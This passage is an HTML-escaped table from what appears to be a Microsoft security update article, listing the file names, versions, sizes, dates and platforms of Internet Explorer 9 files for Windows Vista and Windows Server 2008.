class=\"sbody-td\">10:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,800,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,806,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 9 on all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,346,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:36</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,346,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">763,544</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">763,544</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,494,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,494,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:11</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">85,504</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,392,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:33</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,392,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">887,808</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:38</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">887,808</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:15</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">729,088</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:19</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">729,088</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:32</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:16</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">17,833,984</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">17,835,008</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">548,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:28</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">548,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">305,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">305,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">173,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">173,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">499,200</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">499,200</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:14</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,147,840</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:19</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">182,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,147,840</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">182,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">996,352</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:29</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">996,352</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">237,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:30</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">237,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">10,926,080</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:01</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">248,320</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">10,926,592</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:26</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">248,320</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">141,312</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">141,312</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:14</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">816,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,312,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">816,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,334,720</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">599,040</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:21</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">599,040</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:06</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">65,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,129,472</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">75,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,130,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:20</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">12,336,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">12,336,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">768,512</td><td 